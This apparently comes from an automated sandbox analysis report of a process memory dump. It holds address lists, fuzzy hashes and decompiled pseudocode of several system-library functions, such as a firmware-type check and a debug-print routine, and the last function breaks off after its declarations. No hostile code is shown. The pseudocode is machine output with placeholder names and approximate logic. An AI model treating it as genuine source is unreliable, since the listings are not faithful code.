0x036be592
0x036be596
0x036be59e
0x036be5a0
0x036be5a6
0x036be61d
0x036be61d
0x036be621
0x036be623
0x036be630
0x036be630
0x036be7e6
0x036be7eb
0x036be7ed
0x036be7f4
0x036be7fa
0x036be7ff
0x036be7ff
0x036be80a
0x036be812
0x036be812
0x036be5ab
0x036be5b4
0x036be5b9
0x036be5be
0x036be5c0
0x036be5c2
0x036be5c8
0x036be5c9
0x036be5cb
0x036be5cc
0x036be5d5
0x036be5e4
0x036be5f1
0x036be5f8
0x036be5f8
0x036be5d5
0x036be602
0x036be616
0x036be63d
0x036be644
0x036be64d
0x036be652
0x036be657
0x036be659
0x036be65b
0x036be661
0x036be662
0x036be664
0x036be665
0x036be66e
0x036be67d
0x036be68a
0x036be691
0x036be691
0x036be66e
0x036be6b0
0x00000000
0x036be6b6
0x036be6bd
0x036be6c7
0x036be6d7
0x036be6d9
0x036be6db
0x036be6de
0x036be6e3
0x036be6f3
0x036be6fc
0x036be700
0x036be700
0x036be704
0x036be70a
0x036be70a
0x036be713
0x036be716
0x036be719
0x036be720
0x036be761
0x036be76b
0x036be774
0x036be77a
0x036be77a
0x036be78a
0x036be791
0x036be799
0x036be79b
0x036be79f
0x036be7aa
0x036be7c0
0x036be7ac
0x036be7b2
0x036be7b9
0x036be7b9
0x036be7c7
0x036be806
0x00000000
0x036be7c9
0x036be7d1
0x036be7d8
0x00000000
0x036be7d8
0x00000000
0x00000000
0x036be722
0x036be72e
0x036be748
0x036be74c
0x036be754
0x036be756
0x036be75c
0x036be75c
0x00000000
0x036be75c
0x036be758
0x036be758
0x00000000
0x036be758
0x036be750
0x00000000
0x00000000
0x036be752
0x00000000
0x036be752
0x036be730
0x036be735
0x036be73d
0x036be73f
0x00000000
0x00000000
0x036be741
0x036be741
0x00000000
0x036be741
0x036be739
0x00000000
0x00000000
0x036be73b
0x00000000
0x036be73b
0x036be722
0x036be720
0x036be6b0
0x036be618
0x00000000
0x036be618

Strings

`, xrefs: 036BE670
`, xrefs: 036BE5D7

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 237963054642dd7321c29ff8f7e2fb3baec164b74becd0d9947ece2ad09a15fb
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 7991DD312043419FE724CE25D945B9BB7F6AF84714F18892DF999CB280E776E844CF92

Uniqueness

Uniqueness Score: -1.00%

Function 036751BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E036751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x36d05f0);
				E0364D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0360EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E036753CA(0);
						return E0364D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0363F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03613690(1, _t117, 0x35d1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0363AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03614620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0363AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0367500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03639860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x036751be
0x036751c3
0x036751c8
0x036751cd
0x036751d0
0x036751d3
0x036751d8
0x036751db
0x036751de
0x036751e0
0x036751e3
0x036751e6
0x036751e8
0x03675342
0x03675351
0x03675356
0x0367535a
0x03675360
0x03675363
0x03675366
0x03675369
0x03675369
0x0367536b
0x0367536b
0x03675370
0x036753a3
0x036753a4
0x036753a6
0x036753ab
0x036753ab
0x036753ae
0x036753ae
0x036753b5
0x036753bf
0x036753bf
0x03675375
0x03675396
0x036753a0
0x036753a0
0x00000000
0x03675396
0x03675377
0x03675379
0x0367537f
0x0367538c
0x03675390
0x00000000
0x03675390
0x036751ee
0x036751f1
0x03675301
0x03675310
0x03675315
0x03675318
0x0367531b
0x03675320
0x0367532e
0x03675331
0x00000000
0x03675331
0x03675328
0x03675329
0x00000000
0x03675329
0x036751fa
0x03675235
0x03675236
0x03675239
0x0367523f
0x03675240
0x03675241
0x03675242
0x03675246
0x03675247
0x0367524e
0x03675251
0x03675267
0x03675269
0x0367526e
0x0367527d
0x0367527e
0x03675281
0x03675282
0x03675287
0x03675288
0x0367528a
0x0367528f
0x03675294
0x00000000
0x00000000
0x0367529a
0x0367529c
0x0367529e
0x0367529e
0x036752a4
0x036752b0
0x00000000
0x00000000
0x036752ba
0x036752bc
0x036752bc
0x036752d4
0x036752d9
0x036752dc
0x036752e1
0x00000000
0x00000000
0x036752e7
0x036752f4
0x00000000
0x036752f4
0x03675270
0x00000000
0x03675270
0x036751fc
0x036751fd
0x03675202
0x03675203
0x03675205
0x0367520a
0x0367520f
0x00000000
0x00000000
0x0367521b
0x03675226
0x0367522b
0x0367521d
0x0367521d
0x03675222
0x03675222
0x0367522d
0x00000000

Strings

UEFI, xrefs: 0367521D
Legacy, xrefs: 03675226

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: fce0cd8dc9512f507a8150d579e1ba638f9510df0e311a8804131a2cf3c5e3ac
Instruction ID: 905b82a5537c50a6f8498cbf5865287421a24ca90d00597ad11ed4f91b0c5692
Opcode Fuzzy Hash: fce0cd8dc9512f507a8150d579e1ba638f9510df0e311a8804131a2cf3c5e3ac
Instruction Fuzzy Hash: 91517FB1E007089FDB24DFA8C940AAEBBF8FF45700F54406DE65AEB251EB719901CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0361B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0361B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x36ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03617D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E036C8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03639E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0363B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0363CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03617D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E036C8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0363AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x36e8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x36e862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x36e8628; // 0x0
							_t116 =  *0x36e862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0361b94c
0x0361b956
0x0361b95c
0x0361b95e
0x0361b964
0x0361b969
0x0361b96d
0x0361b96d
0x0361b970
0x0361b974
0x0361b97a
0x0361badf
0x0361badf
0x0361bae2
0x0361bae4
0x0361bae6
0x0361baf0
0x03662cb8
0x0361baf6
0x0361baf6
0x0361baf6
0x0361bafd
0x0361bb1f
0x0361bb1f
0x0361baff
0x0361bb00
0x0361bb00
0x0361bb03
0x0361bb03
0x0361bacb
0x0361bacf
0x0361bad0
0x0361bad1
0x0361badc
0x0361badc
0x0361b980
0x0361b980
0x0361b988
0x0361b98b
0x0361b98d
0x0361b990
0x0361b993
0x0361b999
0x0361b99b
0x0361b9a1
0x0361b9a5
0x0361b9aa
0x0361b9b0
0x0361b9bb
0x0361b9c0
0x0361b9c3
0x0361b9ca
0x0361b9cc
0x0361b9cf
0x0361b9d3
0x0361b9d7
0x0361ba94
0x0361ba94
0x0361ba98
0x0361baa3
0x03662ccb
0x0361baa9
0x0361baa9
0x0361baa9
0x0361bab1
0x03662cd5
0x03662cdd
0x03662cdd
0x0361babb
0x0361babc
0x0361bac2
0x0361bac3
0x0361bac3
0x0361bac6
0x00000000
0x0361b9dd
0x0361b9dd
0x0361b9e7
0x0361b9e7
0x0361b9ec
0x0361b9ec
0x0361b9f1
0x0361b9f5
0x0361b9fa
0x0361ba00
0x0361ba0c
0x0361ba10
0x0361ba10
0x0361ba12
0x0361ba18
0x00000000
0x00000000
0x0361bb26
0x0361bb26
0x0361ba1e
0x0361ba1e
0x0361ba23
0x0361ba25
0x0361ba2c
0x0361ba30
0x0361ba35
0x0361ba35
0x0361ba41
0x0361ba46
0x0361ba4c
0x0361ba50
0x0361ba54
0x0361ba6a
0x0361ba6e
0x0361ba70
0x0361ba74
0x0361ba78
0x0361ba7a
0x0361ba7c
0x0361ba8e
0x0361ba90
0x0361ba92
0x0361bb14
0x0361bb14
0x0361bb16
0x0361bb16
0x00000000
0x0361ba7c
0x0361bb0a
0x0361bb0d
0x00000000
0x00000000
0x00000000
0x0361bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0361B9A5

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 4099a69363aa552b6fac580301e7cea4dec6facec106b07ce4cacff92c36c8eb
Instruction ID: bd17095e6ac4e2cbae637ef8fdddfeb0e50dba70af3d217ba4cee3744a9773b9
Opcode Fuzzy Hash: 4099a69363aa552b6fac580301e7cea4dec6facec106b07ce4cacff92c36c8eb
Instruction Fuzzy Hash: 6F514571A08340CFC720DF29C18092ABBF9FB89640F18896EE9959B354DB71E855CB92

Uniqueness

Uniqueness Score: -1.00%

Function 035FB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E035FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x36cf7a8);
				E0364D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0364D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0363D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0363F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0364DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0363B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0363B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0363E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0363A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x035fb171
0x035fb171
0x035fb171
0x035fb171
0x035fb171
0x035fb176
0x035fb17b
0x035fb180
0x035fb186
0x035fb18f
0x035fb198
0x035fb1a4
0x035fb1aa
0x03654802
0x03654802
0x03654805
0x0365480c
0x0365480e
0x035fb1d1
0x035fb1d3
0x035fb1de
0x035fb1de
0x03654817
0x0365481e
0x03654820
0x03654822
0x03654822
0x03654824
0x03654824
0x0365482a
0x00000000
0x00000000
0x03654835
0x0365483a
0x0365483d
0x0365483f
0x03654842
0x03654842
0x03654842
0x03654846
0x0365484c
0x0365484e
0x03654851
0x03654851
0x03654853
0x03654854
0x03654854
0x03654858
0x0365485a
0x0365485a
0x0365485d
0x0365485f
0x03654861
0x03654861
0x03654866
0x0365486b
0x0365486e
0x03654871
0x03654876
0x03654876
0x03654878
0x0365487b
0x03654884
0x03654884
0x00000000
0x0365487d
0x0365487d
0x03654882
0x03654889
0x03654889
0x0365488f
0x03654891
0x036548e0
0x036548e2
0x036548e4
0x036548e4
0x036548e7
0x036548e7
0x036548ed
0x036548f4
0x036548f6
0x03654951
0x03654951
0x03654953
0x03654953
0x03654956
0x03654956
0x03654958
0x03654959
0x03654959
0x0365495d
0x0365495d
0x0365495f
0x0365495f
0x03654965
0x03654969
0x036549ba
0x036549ba
0x036549c1
0x036549c5
0x036549cc
0x036549d4
0x036549d7
0x036549da
0x036549e4
0x036549e5
0x036549f3
0x03654a02
0x00000000
0x03654a02
0x03654972
0x03654974
0x00000000
0x00000000
0x03654976
0x03654979
0x03654982
0x03654983
0x03654984
0x0365498b
0x0365498d
0x03654991
0x03654993
0x03654999
0x0365499d
0x036549a2
0x036549a2
0x036549a2
0x03654999
0x036549ac
0x00000000
0x036549b3
0x036548f8
0x036548fe
0x00000000
0x00000000
0x00000000
0x036548fe
0x03654895
0x0365489c
0x036548ad
0x036548b2
0x036548b5
0x036548b7
0x036548ba
0x036548bc
0x036548c6
0x036548c6
0x036548cb
0x036548d1
0x036548d4
0x036548d8
0x036548d8
0x00000000
0x036548d8
0x036548be
0x036548c0
0x00000000
0x00000000
0x036548c2
0x00000000
0x00000000
0x00000000
0x036548c4
0x00000000
0x03654882
0x0365487b
0x03654904
0x03654906
0x00000000
0x00000000
0x03654908
0x0365490e
0x00000000
0x00000000
0x03654910
0x03654917
0x03654917
0x00000000
0x03654917
0x035fb1ba
0x036547f9
0x036547fc
0x00000000
0x00000000
0x00000000
0x036547fc
0x035fb1c0
0x035fb1c0
0x035fb1c3
0x035fb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 036548AD

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: eacdd22429c9d3a52c0e5a09d1a9713dd680d5c8c0abef86511ffc81104f6635
Instruction ID: 2074c064770dbe0051f8bcb67bc5b3b1e1085cb394eef952b752f38f65b7994d
Opcode Fuzzy Hash: eacdd22429c9d3a52c0e5a09d1a9713dd680d5c8c0abef86511ffc81104f6635
Instruction Fuzzy Hash: 8A51CD75D042598EEB22CF65C945BAEBBB0BF05710F1442FDEC59AB381DB708981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03622581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E03622581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200926, char _a1546912606) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				void* _t242;
				char* _t243;
				signed int _t246;
				signed int _t248;
				intOrPtr _t250;
				signed int _t253;
				signed int _t260;
				signed int _t263;
				signed int _t271;
				intOrPtr _t277;
				signed int _t279;
				signed int _t281;
				void* _t282;
				signed int _t283;
				unsigned int _t286;
				signed int _t290;
				signed int _t293;
				signed int _t297;
				intOrPtr* _t308;
				intOrPtr _t310;
				signed int _t319;
				signed int _t321;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t332;
				signed int _t333;
				signed int _t335;
